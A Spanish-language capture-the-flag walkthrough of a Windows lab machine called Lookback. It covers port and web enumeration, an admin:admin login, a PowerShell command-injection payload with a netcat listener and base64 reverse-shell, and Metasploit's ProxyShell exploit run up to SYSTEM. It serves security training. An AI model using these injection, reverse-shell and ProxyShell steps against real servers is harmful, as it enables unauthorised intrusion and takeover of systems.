✉️Lookback (Windows)

You’ve been asked to run a vulnerability test on a production environment.

Enumeración de Red

Scan general y específico de servicios

sudo nmap --min-rate 5000 -sS -p- --open -n -Pn 10.10.66.160 -oN puertos
nmap -sCV -p 10.10.66.160 -oN nmap

Resultado nmap

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
443/tcp  open  ssl/https
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7
| Subject Alternative Name: DNS:WIN-12OUO7A66M7, DNS:WIN-12OUO7A66M7.thm.local
| Not valid before: 2023-01-25T21:34:02
|_Not valid after:  2028-01-25T21:34:02
| http-title: Outlook
|_Requested resource was <https://10.10.66.160/owa/auth/logon.aspx?url=https%3a%2f%2f10.10.66.160%2fowa%2f&reason=0>
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7.thm.local
| Not valid before: 2025-07-30T08:11:33
|_Not valid after:  2026-01-29T08:11:33
| rdp-ntlm-info: 
|   Target_Name: THM
|   NetBIOS_Domain_Name: THM
|   NetBIOS_Computer_Name: WIN-12OUO7A66M7
|   DNS_Domain_Name: thm.local
|   DNS_Computer_Name: WIN-12OUO7A66M7.thm.local
|   DNS_Tree_Name: thm.local
|   Product_Version: 10.0.17763
|_  System_Time: 2025-07-31T08:22:14+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeración de Servicio Web

Ffuf

ffuf -u <http://10.10.66.160/FUZZ> -w ~/Hunting/Wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -c -fs 0

/ecp → Microsoft ECP (Exchange Admin Center)
/test → HTTP Basic Auth

Weak Credentials: admin:admin → Auth Bypass

Enumeración Post-Autenticación

Random input triggers error message

Get-Content : Cannot find path 'C:\BitlockerActiveMonitoringLogs;s' because it does not exist.
At line:1 char:1
+ `Get-Content('C:\BitlockerActiveMonitoringLogs;s')`
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\BitlockerActiveMonitoringLogs;s:String) [Get-Content], ItemNotFoundE 
   xception
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand

Explotación: Command Injection

Código Vulnerable

Get-Content('C:\\BitlockerActiveMonitoringLogs')

Payload

Escape de contexto, operador encadenante, comando y comentario

') | <command> #

PoC

BitlockerActiveMonitoringLogs') | whoami #

thm\admin

Explotación

Listener

nc -lvnp 1234

Reverse PowerShell (Base64 encoded)

BitlockerActiveMonitoringLogs') | powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGU.... #

Intrusión en el Sistema

PowerShell: thm\admin

Enumeración Post-Intrusión

C:\users\dev\desktop\todo.txt

Hey dev team,
This is the tasks list for the deadline:
Promote Server to Domain Controller [DONE] Setup Microsoft Exchange [DONE] Setup IIS [DONE] Remove the log analyzer[TO BE DONE] Add all the users from the infra department [TO BE DONE] Install the Security Update for MS Exchange [TO BE DONE] Setup LAPS [TO BE DONE]
When you are done with the tasks please send an email to: [email protected] [email protected] and do not forget to put in CC the infra team! [email protected]

Users: joe, carol
Emails: [email protected], [email protected], [email protected]

Comprobando usuarios locales

net users

Local users: administrator, dev

Security Update for MS Exchange [TO BE DONE]

Enumeración de MS Exchange Server

Comprobar versión de MS Exchange

Get-Command Exsetup.exe

Build: 15.2.858.5

Exchange Server build numbers and release datesMicrosoftLearn

Exchange Server 2019 CU9 - March 16, 2021 - 15.2.858.5

Comprobar exploits para versión en metasploit

search Exchange Server 2019 CU9

> exploit/windows/http/exchange_proxyshell_rce

Explotación: CVE-2021-34473 (Microsoft Exchange ProxyShell RCE)

Exploitation Error

error: [*] Enumerated 0 email addresses

Ajuste de parámetro en exploit

metasploit > SET EMAIL [email protected]

Compromiso del Sistema

Shell: NT AUTHORITY\SYSTEM

Última actualización hace 4 meses